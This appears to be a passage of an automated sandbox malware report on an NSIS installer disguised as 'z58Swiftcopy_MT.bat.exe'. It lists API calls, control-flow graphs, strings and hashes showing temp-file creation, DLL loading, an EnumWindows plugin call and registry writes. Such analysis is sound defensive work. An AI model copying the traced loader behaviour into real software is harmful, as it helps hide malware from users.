                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\nsb9327.tmp$C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll$Call$user32::EnumWindows(i r1 ,i 0)

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 476 405686-4056d1 CreateDirectoryA 477 4056d3-4056d5 476->477 478 4056d7-4056e4 GetLastError 476->478 479 4056fe-405700 477->479 478->479 480 4056e6-4056fa SetFileSecurityA 478->480 480->477 481 4056fc GetLastError 480->481 481->479
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004056DD
                                                                                                                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004056F2
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004056FC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004056AC
                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00405686
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 3449924974-26219170
                                                                                                                                                                                                                                      • Opcode ID: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                                                                                                                                                      • Instruction ID: f1d10c799bfca9e4ec05a1b7c6bbaf57c6c97cfabee98fddb41b1e3f6ffc1dc8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b585f5161d807d3f0f7c483c76382efe3a1db6be34ae0fb1d35030ff25d5446d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13010871D10259EADF109FA4C9047EFBFB8EB14315F10447AD544B6290DB7A9604CFA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 482 4063c3-4063e3 GetSystemDirectoryA 483 4063e5 482->483 484 4063e7-4063e9 482->484 483->484 485 4063f9-4063fb 484->485 486 4063eb-4063f3 484->486 488 4063fc-40642e wsprintfA LoadLibraryExA 485->488 486->485 487 4063f5-4063f7 486->487 487->488
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406413
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                                                      • API String ID: 2200240437-4240819195
                                                                                                                                                                                                                                      • Opcode ID: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                                                                                                                      • Instruction ID: c4678dfb2da91d08484603cd09ba86b434f6c063b959f4a2bfe8732341513f46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e24acbe6227527768190d78db3c852bebda673ce15d2d0c5597dd6d7ee2660dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F0FC7054060967DB149768DD0DFEB365CEB08304F14057EA587E10D1D978D8358B98

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 489 401ffd-402009 490 4020c4-4020c6 489->490 491 40200f-402025 call 402ac1 * 2 489->491 492 402237-40223c call 401423 490->492 502 402034-402042 LoadLibraryExA 491->502 503 402027-402032 GetModuleHandleA 491->503 498 402951-402960 492->498 499 402716-40271d 492->499 499->498 505 402044-402051 GetProcAddress 502->505 506 4020bd-4020bf 502->506 503->502 503->505 507 402090-402095 call 4051c0 505->507 508 402053-402059 505->508 506->492 513 40209a-40209d 507->513 509 402072-402089 call 100016bd 508->509 510 40205b-402067 call 401423 508->510 515 40208b-40208e 509->515 510->513 520 402069-402070 510->520 513->498 516 4020a3-4020ab call 403889 513->516 515->513 516->498 521 4020b1-4020b8 FreeLibrary 516->521 520->513 521->498
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • user32::EnumWindows(i r1 ,i 0), xrefs: 0040207C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                      • String ID: user32::EnumWindows(i r1 ,i 0)
                                                                                                                                                                                                                                      • API String ID: 2987980305-797600110
                                                                                                                                                                                                                                      • Opcode ID: 60fb46ecd7be2e423669211bfc99dba76962e3cb0b4c4fdd8d202bc87f238218
                                                                                                                                                                                                                                      • Instruction ID: b9fd2243ea981f5bcf097e6c9410b7191d7035710d5254353367cb498e194193
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fb46ecd7be2e423669211bfc99dba76962e3cb0b4c4fdd8d202bc87f238218
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C21C971A04225A7CF207FA48E4DB6E7660AB44358F21413BF711B62D0CBBD4942965E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 523 405c61-405c6b 524 405c6c-405c97 GetTickCount GetTempFileNameA 523->524 525 405ca6-405ca8 524->525 526 405c99-405c9b 524->526 528 405ca0-405ca3 525->528 526->524 527 405c9d 526->527 527->528
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405C75
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • nsa, xrefs: 00405C6C
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00405C61
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-3732674327

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                                                                        • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
                                                                                                                                                                                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1791698881-3916222277

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000023,00000011,00000002), ref: 0040241B
                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 00402458
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb9327.tmp
                                                                                                                                                                                                                                      • API String ID: 2655323295-1374660692

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                                                                        • Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne, xrefs: 00401631
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 732 405b1f-405b3a call 406099 call 405aca 737 405b40-405b4d call 406303 732->737 738 405b3c-405b3e 732->738 742 405b59-405b5b 737->742 743 405b4f-405b53 737->743 739 405b92-405b94 738->739 745 405b71-405b7a lstrlenA 742->745 743->738 744 405b55-405b57 743->744 744->738 744->742 746 405b7c-405b90 call 405a31 GetFileAttributesA 745->746 747 405b5d-405b64 call 40639c 745->747 746->739 752 405b66-405b69 747->752 753 405b6b-405b6c call 405a78 747->753 752->738 752->753 753->745
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405B72
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0), ref: 00405B82
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 3248276644-3404278061
                                                                                                                                                                                                                                      • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                                                                                                                                                                                                      • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                                                                                                                                                                                                      • Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                                                                                                                                                                                                      • Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
APIs
• GetTickCount.KERNEL32 ref: 0040315A
  • Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
• SetFilePointer.KERNELBASE(000C46A1,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288
Memory Dump Source
• Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: FilePointer$CountTick
• String ID:
• API String ID: 1092082344-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                                                                                                                                                                                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Enum$CloseValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 397863658-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      Similarity
